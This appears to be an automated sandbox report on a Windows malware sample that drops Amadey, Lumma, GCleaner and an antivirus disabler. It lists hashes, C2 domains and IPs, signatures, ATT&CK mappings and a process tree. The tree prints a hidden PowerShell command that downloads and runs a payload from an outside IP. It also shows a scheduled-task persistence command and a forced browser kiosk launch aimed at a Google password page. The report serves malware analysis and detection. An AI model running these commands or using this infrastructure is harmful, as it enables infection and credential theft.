Overview

overview

10

Static

static

5

2025-04-02...er.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    145s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/04/2025, 15:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    e9c3720b101e469f261fe20e246e3e97

  • SHA1

    085847380cebb6beab8324221429deb9164b904b

  • SHA256

    a6334a19d5f77be548a00862a4c9b5f0863575a2cd42e3a43aae2a8ab4280f55

  • SHA512

    0b751fc5908808ffd0fc9b0a22908d8aa9599aedfbd71460a676dcab58365afaf9876895db2ea85c509fd606523189d2e9d7d6956cc9640ae1551c635e77e84d

  • SSDEEP

    24576:kqDEvCTbMWu7rQYlBQcBiT6rprG8a0zu:kTvC/MTQYxsWR7a0z

Score
10/10
amadeygcleanerhealerlumma092155defense_evasiondiscoverydropperevasionexecutionloaderpersistencespywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

gcleaner

C2

185.156.73.98

45.91.200.135

Extracted

Family

lumma

C2

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://iqironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://starcloc.bet/GOksAo

https://madvennture.top/GKsiio

https://targett.top/dsANGt

https://qspacedbv.world/EKdlsk

https://igalxnetb.today/GsuIAo

https://hcosmosyf.top/GOsznj

https://ironloxp.live/aksdd

https://hywnnavstarx.shop/FoaJSi

https://advennture.top/GKsiio

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

    loadergcleaner
  • Gcleaner family
    gcleaner
  • Healer

    Healer an antivirus disabler dropper.

    dropperhealer
  • Healer family
    healer
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    stealerlumma
  • Lumma family
    lumma
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    defense_evasiontrojan
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
    defense_evasiontrojan
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
    defense_evasion
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file 10 IoCs
  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 15 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Windows security modification 2 TTPs 2 IoCs
    defense_evasiontrojan
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 20 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
    defense_evasion
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 41 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 32 IoCs
  • Suspicious use of SendNotifyMessage 26 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2988
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn l6KaEmalXaD /tr "mshta C:\Users\Admin\AppData\Local\Temp\a5p1F7bV7.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5076
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn l6KaEmalXaD /tr "mshta C:\Users\Admin\AppData\Local\Temp\a5p1F7bV7.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:6132
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\a5p1F7bV7.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:832
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'4WM8YUEWXKVKCJWIUKFLVO04UGP0DBXS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1380
        • C:\Users\Admin\AppData\Local\Temp4WM8YUEWXKVKCJWIUKFLVO04UGP0DBXS.EXE
          "C:\Users\Admin\AppData\Local\Temp4WM8YUEWXKVKCJWIUKFLVO04UGP0DBXS.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4532
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4220
            • C:\Users\Admin\AppData\Local\Temp\10419730101\b2c8a4d481.exe
              "C:\Users\Admin\AppData\Local\Temp\10419730101\b2c8a4d481.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1204
              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                "C:\Users\Admin\AppData\Local\Temp\10419730101\b2c8a4d481.exe"
                7⤵
                • Downloads MZ/PE file
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2880
            • C:\Users\Admin\AppData\Local\Temp\10419740101\141b76bc55.exe
              "C:\Users\Admin\AppData\Local\Temp\10419740101\141b76bc55.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:3088
              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                "C:\Users\Admin\AppData\Local\Temp\10419740101\141b76bc55.exe"
                7⤵
                • Downloads MZ/PE file
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2856
            • C:\Users\Admin\AppData\Local\Temp\10419750101\607d38be61.exe
              "C:\Users\Admin\AppData\Local\Temp\10419750101\607d38be61.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:6044
            • C:\Users\Admin\AppData\Local\Temp\10419760101\5e35cdfe6b.exe
              "C:\Users\Admin\AppData\Local\Temp\10419760101\5e35cdfe6b.exe"
              6⤵
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:6052
            • C:\Users\Admin\AppData\Local\Temp\10419770101\4992f80afa.exe
              "C:\Users\Admin\AppData\Local\Temp\10419770101\4992f80afa.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:720
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM firefox.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2648
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM chrome.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3688
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM msedge.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3984
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM opera.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3204
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM brave.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4132
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                7⤵
                  PID:3116
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                    8⤵
                    • Checks processor information in registry
                    • Modifies registry class
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    • Suspicious use of SetWindowsHookEx
                    PID:3780
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2028 -prefsLen 27099 -prefMapHandle 2032 -prefMapSize 270279 -ipcHandle 2108 -initialChannelId {15741c17-09d1-42f6-9d76-868b069a345a} -parentPid 3780 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3780" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                      9⤵
                        PID:2252
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2516 -prefsLen 27135 -prefMapHandle 2520 -prefMapSize 270279 -ipcHandle 2528 -initialChannelId {440d09c1-23c3-4821-9084-f10544a72906} -parentPid 3780 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3780" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                        9⤵
                          PID:5572
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3824 -prefsLen 25164 -prefMapHandle 3828 -prefMapSize 270279 -jsInitHandle 3832 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3836 -initialChannelId {4b2ffb57-164f-4b57-84b2-42f66e05c97d} -parentPid 3780 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3780" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                          9⤵
                          • Checks processor information in registry
                          PID:1808
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3984 -prefsLen 27276 -prefMapHandle 3988 -prefMapSize 270279 -ipcHandle 4072 -initialChannelId {e8bcce53-cb70-48e3-83d5-e8d5980e03f2} -parentPid 3780 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3780" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                          9⤵
                            PID:1764
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 1680 -prefsLen 34775 -prefMapHandle 3132 -prefMapSize 270279 -jsInitHandle 3188 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 1332 -initialChannelId {61ff8638-ade8-4006-872e-544c7309f0e7} -parentPid 3780 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3780" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                            9⤵
                            • Checks processor information in registry
                            PID:4092
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 2972 -prefsLen 34905 -prefMapHandle 5280 -prefMapSize 270279 -ipcHandle 5316 -initialChannelId {6b913266-83e9-49ec-a0f1-5d92103c93a3} -parentPid 3780 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3780" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                            9⤵
                            • Checks processor information in registry
                            PID:3048
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5524 -prefsLen 32845 -prefMapHandle 5540 -prefMapSize 270279 -jsInitHandle 5544 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5552 -initialChannelId {c00787cf-9220-4dd5-afbc-e133a9ef6275} -parentPid 3780 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3780" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                            9⤵
                            • Checks processor information in registry
                            PID:4708
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4564 -prefsLen 32845 -prefMapHandle 3216 -prefMapSize 270279 -jsInitHandle 4488 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3004 -initialChannelId {c818a787-c4f3-480e-a444-f3f5114f34bf} -parentPid 3780 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3780" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                            9⤵
                            • Checks processor information in registry
                            PID:4476
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5780 -prefsLen 32952 -prefMapHandle 5784 -prefMapSize 270279 -jsInitHandle 5788 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5796 -initialChannelId {ef7ac289-b613-4f2a-8774-4daa053a80b4} -parentPid 3780 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3780" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                            9⤵
                            • Checks processor information in registry
                            PID:2972
                    • C:\Users\Admin\AppData\Local\Temp\10419780101\0f59d4b806.exe
                      "C:\Users\Admin\AppData\Local\Temp\10419780101\0f59d4b806.exe"
                      6⤵
                      • Modifies Windows Defender DisableAntiSpyware settings
                      • Modifies Windows Defender Real-time Protection settings
                      • Modifies Windows Defender TamperProtection settings
                      • Modifies Windows Defender notification settings
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Windows security modification
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:5656
                    • C:\Users\Admin\AppData\Local\Temp\10419790101\756b939269.exe
                      "C:\Users\Admin\AppData\Local\Temp\10419790101\756b939269.exe"
                      6⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5200
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        7⤵
                          PID:3528
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          7⤵
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2956
                      • C:\Users\Admin\AppData\Local\Temp\10419800101\ba60ba50d1.exe
                        "C:\Users\Admin\AppData\Local\Temp\10419800101\ba60ba50d1.exe"
                        6⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:1296
            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              1⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              PID:4592
            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              1⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              PID:3924
            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              1⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              PID:8

            Network

            MITRE ATT&CK Enterprise v15

            Reconnaissance

            Resource Development

            Initial Access

            Execution

            Command and Scripting Interpreter

            1
            T1059

            PowerShell

            1
            T1059.001

            Scheduled Task/Job

            1
            T1053

            Scheduled Task

            1
            T1053.005

            Persistence

            Boot or Logon Autostart Execution

            1
            T1547

            Registry Run Keys / Startup Folder

            1
            T1547.001

            Create or Modify System Process

            4
            T1543

            Windows Service

            4
            T1543.003

            Scheduled Task/Job

            1
            T1053

            Scheduled Task

            1
            T1053.005

            Privilege Escalation

            Boot or Logon Autostart Execution

            1
            T1547

            Registry Run Keys / Startup Folder

            1
            T1547.001

            Create or Modify System Process

            4
            T1543

            Windows Service

            4
            T1543.003

            Scheduled Task/Job

            1
            T1053

            Scheduled Task

            1
            T1053.005

            Defense Evasion

            Impair Defenses

            5
            T1562

            Disable or Modify Tools

            5
            T1562.001

            Modify Registry

            6
            T1112

            Virtualization/Sandbox Evasion

            2
            T1497

            Credential Access

            Unsecured Credentials

            1
            T1552

            Credentials In Files

            1
            T1552.001

            Discovery

            Query Registry

            7
            T1012

            System Information Discovery

            4
            T1082

            System Location Discovery

            1
            T1614

            System Language Discovery

            1
            T1614.001

            Virtualization/Sandbox Evasion

            2
            T1497

            Lateral Movement

            Collection

            Data from Local System

            1
            T1005

            Command and Control

            Exfiltration

            Impact

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\MHD417D2\soft[1]
              Filesize

              3.0MB

              MD5

              91f372706c6f741476ee0dac49693596

              SHA1

              8e8973d35d3de0ade6cc8e44cd21f2cffbdfe83d

              SHA256

              9a401dded25b4bafd24225449ed48468787290bbb308dc5e40511da2858bb781

              SHA512

              88b26c1c49bc2a77dbdcea0e22c33555932498b3a4cff66f6b08438c0d96a017367c14508249aa1ca2090ed0ca6081e28757fbda97f856675d9db9cc61f7b7ed

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\W212EQCE\service[1].htm
              Filesize

              1B

              MD5

              cfcd208495d565ef66e7dff9f98764da

              SHA1

              b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

              SHA256

              5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

              SHA512

              31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

              Download Submit

            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\0o5pj305.default-release\activity-stream.discovery_stream.json
              Filesize

              22KB

              MD5

              18936c10737d58eb395e8d6cd19dc2fb

              SHA1

              ea1b71846b03c1b56d7337e3c16446c3ef23255c

              SHA256

              4a250177353a0c48a1712b12d6eff2b347e5a6d129ee7fbc3657645135d8ca06

              SHA512

              1a377181eda5004f24050a1fe44bbfe61137b377a349186c7fe3605e2d0a23a090f3159924251fc234cdc12e1ff582200c72e26229c473d923f7198052a9a4b9

              Download Submit

            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\0o5pj305.default-release\cache2\entries\A585344A45AF937E3AB7D706291A9A3ED8D581D9
              Filesize

              13KB

              MD5

              385ad731023417e4cf645df0e64107ca

              SHA1

              a7bc1355648f410df3d71692cfb9f9896ce205df

              SHA256

              920a4f4d9a8639be2cac781cca7666a1e6a1cd126f88f751b7670305ceabb4a5

              SHA512

              2499f4fec9f792fd01af02bbb882188fd2f184e26a23f903d0750aa75b471bf0064bd89ce34a19b677f35ba46a5b444e94b63dcbcd8c468e844cbff1775324e6

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp4WM8YUEWXKVKCJWIUKFLVO04UGP0DBXS.EXE
              Filesize

              1.8MB

              MD5

              7b4c5fa52c698720d7d9e45ed2d7a711

              SHA1

              0242af88692e8fd8e1075a762ae13cf315385a6c

              SHA256

              058476af0241212cf5ed6dd22bd2eba6ec72afea0364357fba9eb870f06c2368

              SHA512

              2358ea5f1a59cbd7041872bb3ce349dda31a559d8a697cd20443bef825f33602b1b41123dd7cf37b6a1d7d9cac03fe17bb08be8651b30968e20b8a5e6c788327

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\10419730101\b2c8a4d481.exe
              Filesize

              4.5MB

              MD5

              82a660623656c064fb7a7598ff283512

              SHA1

              9962f734b944a3c60879d590d974db4eb85a41c5

              SHA256

              579aa629ade38640ab1fb3f8c9e7a1c172062d4740fc797456803db12415ca51

              SHA512

              e08d0a106869753789e2212c2eef998b56a20baf0080ceb9112eb6fa01e6e92751850fa2ee5e3a261adc30514f7b76bf2585dd0de3f3774011d06565d861f157

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\10419740101\141b76bc55.exe
              Filesize

              4.3MB

              MD5

              d7d5b2f460ab2a552ccd37ffe846f39a

              SHA1

              a84bd114c44827a07e29a548211c769bfda274c2

              SHA256

              5a19f74e5205b970c5f36c0c466f2f888412e14bf7f95b22856c4a7739e64eb1

              SHA512

              502e408d9fd0fc15bcc23b8f958a96cd8f26306513802f30e6ee0dda985ce409cbf99c7ff2385002d2de1be005317b8cb011cecd0989fed0da58c59e8b771b7f

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\10419750101\607d38be61.exe
              Filesize

              2.0MB

              MD5

              69688177ed1baa1e21ebf5b8cc5d416e

              SHA1

              eba68df7434baadb9a536f6cd7d66ff113a42ffa

              SHA256

              b59e061f2ea5a7f4cdd2a5edeead169998f9a9ee959e51386051f69a518a263c

              SHA512

              55fd5ea2b5fcfe6fa6bf79d3fe6e5a5e44e85a487d7709e4e5e047716aa33a9c6360491fe2d781f459ebe3d7e204cfd5cc751fc0eb9a11435fac959111e3d6cd

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\10419760101\5e35cdfe6b.exe
              Filesize

              2.4MB

              MD5

              6bcaa6f066af78f85f1106de1ea00031

              SHA1

              4981bdc7125f2460afc0b514241c785736d71268

              SHA256

              27613cc4f4a71db26084707ad958d9e8228e654e4ea575dd1c0dc7bbb92845cd

              SHA512

              1364694219b2730de483b201586da626889e36d661aa4c53b96e10baa5ee47c04f00e1779dec01335938538272bcc77a905f626f1a2f1e3a964c3b3d6972a96b

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\10419770101\4992f80afa.exe
              Filesize

              950KB

              MD5

              dcfce6257bd41af54060a4429662d291

              SHA1

              b14fda486f0dcc3167432666aea136ef962f66bc

              SHA256

              1a3be077f95f1f86b8efae98b20b07d389225860d31027d1f0638841475f7612

              SHA512

              d8e6dd08a65a340dec6aa30f29e45990393c36d65372811108e754fdb4decc6f959abbd15bcd4a0cc1eb013c7fe3d6bcf42cb8672f3cd2681f032244b31b2842

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\10419780101\0f59d4b806.exe
              Filesize

              1.6MB

              MD5

              5fc1c5eb9a034468541060c199beeb32

              SHA1

              d5f39e29fc056e56d62984a759bc396928cdcfd5

              SHA256

              25ccf0acdb6d0d78422a25b800472e22d3e6f00e1a7a58ef51bd53c364541650

              SHA512

              0148bafd450034dffe559d278211f7b5951d064866c446818f8d0fabfe8b887ea06fc5c08958811dc55481d88ca81039cafae36ee4c0932aecc53b101a0aa410

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\10419790101\756b939269.exe
              Filesize

              2.1MB

              MD5

              8b7a6718ca74360fe9f51999563d5bd4

              SHA1

              bba0641bc9c1360d8df011c5ad99d648536fd2a2

              SHA256

              bb27921192d981c37db53a0c53e5298d35b5bb219638c66eb1ee2d63ccd2096d

              SHA512

              3b3fe72040fadbb15273e2bbf6ccdd02a2cf8c736d1d8dac3a5c006274ac9d31e3c44dc5f793afbc98696bd958714b48f8a5efe7e7f2f17a5ceb6b5d308392d0

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\10419800101\ba60ba50d1.exe
              Filesize

              716KB

              MD5

              57a5e092cf652a8d2579752b0b683f9a

              SHA1

              6aad447f87ab12c73411dec5f34149034c3027fc

              SHA256

              29054ff2ce08e589dcc28d1e831f0c99659148f1faaabc81913207c4d12b4a34

              SHA512

              5759fc4bf73a54899fb060df243cdd1c1629504b20695d7116317a1941ef1f86449c9c3388d5a48bc7e4223207c985eadba1950e15c045d15890423701ba1b1f

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\10419800101\ba60ba50d1.exe
              Filesize

              358KB

              MD5

              e604fe68e20a0540ee70bb4bd2d897d0

              SHA1

              00a4d755d8028dbe2867789898b1736f0b17b31c

              SHA256

              6262dac7e6839a9300b48f50d6d87011fc3e9baae5bbcec14ba00b7a6da6f361

